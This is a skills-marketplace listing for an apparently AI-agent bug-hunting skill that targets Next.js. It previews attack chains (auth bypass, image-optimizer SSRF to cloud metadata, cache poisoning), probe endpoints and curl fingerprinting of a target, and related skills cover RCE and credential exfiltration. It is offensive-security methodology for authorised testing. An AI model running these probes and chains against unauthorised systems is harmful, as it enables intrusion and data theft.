hunt-nextjs

Solid

Hunt Next.js specific vulnerabilities — Server Actions arbitrary function execution, Middleware auth bypass via static asset paths, ISR cache poisoning, Image Optimization SSRF (/_next/image), RSC payload leakage, getServerSideProps injection, source map exposure, debug endpoint leakage. Use when target runs Next.js 13/14/15 or any React SSR framework.

Web & Frontend 1,912 stars 279 forks Updated 3 days ago NOASSERTION

Install

View on GitHub

Quality Score: 86/100

Stars 20%
100
Recency 20%
100
Frontmatter 20%
70
Documentation 15%
100
Issue Health 10%
50
License 10%
100
Description 5%
100

Skill Content

# HUNT-NEXTJS — Next.js / SSR Framework Vulnerabilities ## Crown Jewel Targets Next.js-specific bugs that bypass auth or reach SSRF = High/Critical. **Highest-value chains:** - **Server Actions auth bypass** — Server Actions enforce auth client-side only → call action ID directly → unauthorized data mutation or exfil - **Middleware bypass via `/_next/static/`** — middleware skips static asset paths → protected routes accessible via `/_next/data/` IDOR - **`/_next/image` SSRF** — Image optimizer fetches attacker-controlled URL → internal network scan or cloud metadata - **ISR stale cache poisoning** — inject malicious content into a cached page that gets served to all users - **RSC payload leakage** — React Server Component flight data contains server-side props not meant for client --- ## Attack Surface Signals ``` /_next/image?url=&w=&q= Image optimizer — SSRF candidate /_next/data/BUILD_ID/*.json Prerendered page data — IDOR candidate /__nextjs_original-stack-frame Debug stack frame endpoint /_next/static/chunks/ JS bundles — source map candidate /api/ API routes — standard hunt surface __NEXT_DATA__ in HTML SSR props leaked to client x-nextjs-* response headers Confirms Next.js ``` --- ## Phase 1 — Fingerprint & Version Detection ```bash # Confirm Next.js and get build ID curl -s https://$TARGET/ | grep -oP '"buildId":"[^"]+"' curl -sI https://$TARGET/ | grep -i "x-powered-by\|x-nextjs" # Extra...

Details

Author
elementalsouls
Repository
elementalsouls/Claude-BugHunter
Created
1 months ago
Last Updated
3 days ago
Language
Python
License
NOASSERTION

Integrates with

Anthropic · AI Next.js · Frontend

Similar Skills

Semantically similar based on skill content — not just same category

AI & Automation Solid

hunt-nodejs

Hunt Node.js specific vulnerabilities — Prototype Pollution → RCE chains (lodash/merge/assign), Express trust proxy misconfiguration, child_process/eval injection, template engine SSTI (EJS/Pug/Handlebars), path traversal in file servers, require() injection, environment variable exfil via /proc/self/environ. Use when target runs Node.js/Express/Fastify/NestJS/Koa.

1,912 Updated 3 days ago
elementalsouls
Testing & QA Solid

hunt-springboot

Hunt Spring Boot specific vulnerabilities — Actuator endpoints (heapdump, env, loggers, mappings, shutdown), Spring Expression Language (SpEL) injection → RCE, H2 console RCE, Jolokia JMX exposure, Spring4Shell (CVE-2022-22965), Spring Cloud Function SPEL (CVE-2022-22963), heap dump credential extraction. Use when target runs Spring Boot — detected via X-Application-Context header, /actuator, Whitelabel Error Page, or Java stack traces.

1,912 Updated 3 days ago
elementalsouls
Web & Frontend Solid

hunt-dom

Hunt client-side DOM vulnerabilities — DOM Clobbering (overwrite JS globals via HTML injection), PostMessage hijacking (missing origin check), Service Worker abuse (intercept requests from same-origin script), CSS Injection/Exfiltration (attribute selectors → token char-by-char via OOB), client-side template injection, dangerouslySetInnerHTML. Grounded in named public research: Gareth Heyes / PortSwigger DOM-clobbering + DOM-Invader, Michał Bentkowski DOMPurify clobbering bypasses, jQuery htmlPrefilter XSS (CVE-2020-11022 / CVE-2020-11023), d0nut CSS-exfil research. Use when hunting DOM-XSS, client-side auth bypass, or token exfiltration without server-side interaction.

1,912 Updated 3 days ago
elementalsouls